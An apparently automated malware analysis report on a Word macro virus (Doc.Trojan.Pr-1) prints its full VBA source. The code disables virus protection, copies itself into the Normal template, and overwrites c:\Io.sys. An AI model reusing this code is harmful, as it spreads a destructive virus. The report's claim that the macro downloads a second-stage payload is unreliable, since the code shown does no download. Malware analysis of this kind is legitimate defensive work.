Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 21a1a5df79b87f1b…

MALICIOUS

Office (OLE)

Size: 33.0 KB
Created: 1997-09-17 10:18:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 842c8893932c9e3c10928186407b285f
SHA-1: bd4cf7a7d8d8a7f2ed0c345a72796ba2b4624d56
SHA-256: 21a1a5df79b87f1b369ef223556955b755deaf6f8b1db7344fbe98119ffb7244
Risk Score: 140

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The file contains VBA macros that are detected as malicious by ClamAV. The macro code attempts to write 'M97v' to the file 'c:\Io.sys' and then sets its attributes to system. This suggests the macro is designed to download and execute a second-stage payload, likely using the 'c:\Io.sys' file as a staging area. The document body content appears to be unrelated filler text.

Heuristics (2)

  • ClamAV: Doc.Trojan.Pr-1 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Trojan.Pr-1
  • VBA macros detected [medium, OLE_VBA_MACROS]
    Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 997 bytes
SHA-256: 928f8c39f9603e6ab29b1fa18da3c8fb91697ce4d33b2efd69f04c964ec04d54
Detection: ClamAV: Doc.Trojan.Pr-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True



























'
Dim A, B, D, E As Integer
Dim t, m, f
Private Sub Document_Close()
Options.VirusProtection = False
A = 1: B = 2: pr1
A = 2: B = 1: pr1
t = VBA.Time
m = Minute(t)
If m <> 13 Then End
f = "c:\Io.sys"
SetAttr f, vbNormal
Open f For Output As #1
Print #1, "M97v"
Close
SetAttr f, vbSystem
End
End Sub
Private Sub pr1()
 D = Application.VBE.VBProjects(A).VBComponents(1).CodeModule.CountOfLines
 E = Application.VBE.VBProjects(B).VBComponents(1).CodeModule.CountOfLines
 If D > 10 Then Exit Sub
Application.VBE.VBProjects(A).VBComponents(1).CodeModule.AddFromString (Application.VBE.VBProjects(B).VBComponents(1).CodeModule.Lines(2, E))
End
End Sub
'
'M97v